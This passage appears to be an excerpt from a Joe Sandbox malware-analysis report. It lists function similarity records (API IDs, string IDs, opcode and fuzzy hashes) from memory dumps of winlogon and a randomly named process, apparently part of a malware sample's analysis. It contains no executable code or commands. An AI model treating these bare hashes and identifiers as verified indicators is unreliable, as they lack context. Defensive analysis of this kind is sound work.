                          • API String ID: 592178966-758928094
                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction ID: 2c5b5f2923ff0a7a55bd4f6c064529cbb27ade499dec8ece143054e1ec4af3e3
                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction Fuzzy Hash: 5CE04F61650B84D1DB0A8F61E8802D873A09B58B64B8991229D5C16311EE38D1E9C300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: ierarchy Descriptor'$riptor at (
                          • API String ID: 592178966-758928094
                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction ID: ec66882b4d3ae1b64dd5078d85d2ddc26122b5e01e13c0459ee6ee22340de03e
                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction Fuzzy Hash: 12E08671650B85D0EF018F21E8402DC73A1DF58B64F8891339D5C06311FE38D1E9C300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: Locator'$riptor at (
                          • API String ID: 592178966-4215709766
                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction ID: 8db7e502f7541ce4c4e4eefef0bcc65bf87d560e7147f37bfdc45b7fe914ba80
                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction Fuzzy Hash: 5FE08C71A20B88C4DF0A8F61E8802DCB3A0EB68B64BC89133CE4C16351EE38D1E9C300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: Locator'$riptor at (
                          • API String ID: 592178966-4215709766
                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction ID: 51b56e7d7da7883d564ff1d8aa55c5c33bcb232568c085f55078eb698fd1127b
                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction Fuzzy Hash: 3CE08C71A20B88C4EF028F21E8802DCB3A1EB68B64FC89133CE4C06311EE38D1E9C300
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction ID: e1d6aeabad6ccef3ff38877d506157880c324e0593935b115836214f7ad20565
                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction Fuzzy Hash: BE116035725BC4C5EA15DB66E8043ADB7A1FB89FC1F18403ADE4D53765DE39C8428300
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction ID: caadc08de9d2bac00fe2f05b454c5bd5b931daf7e9d403db42940cda31ad44e3
                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction Fuzzy Hash: CEE03975721684C6EB058BA2D80838ABFE1EB89B06F0480288D0907351DF7EC499C750
                          Memory Dump Source
                          • Source File: 0000004C.00000002.2207521315.00007FF7F7901000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7F7900000, based on PE: true
                          • Associated: 0000004C.00000002.2207389031.00007FF7F7900000.00000002.00000001.01000000.0000000F.sdmp
                          • Associated: 0000004C.00000002.2207704980.00007FF7F790B000.00000002.00000001.01000000.0000000F.sdmp
                          • Associated: 0000004C.00000002.2207869019.00007FF7F790E000.00000004.00000001.01000000.0000000F.sdmp
                          • Associated: 0000004C.00000002.2208057212.00007FF7F790F000.00000008.00000001.01000000.0000000F.sdmp
                          • Associated: 0000004C.00000002.2209368300.00007FF7F7E38000.00000004.00000001.01000000.0000000F.sdmp
                          • Associated: 0000004C.00000002.2209405116.00007FF7F7E3A000.00000002.00000001.01000000.0000000F.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_76_2_7ff7f7900000_lrgkmixyjzta.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                          • Instruction ID: 9818f9520f7ee46933123e9105cd5399884de6284cbdb732cfc1c1fc15afbbd7
                          • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                          • Instruction Fuzzy Hash: AFB0922892420A84E304BB21A84126C62706B08B42F800020D42C02392CA6D50424BA0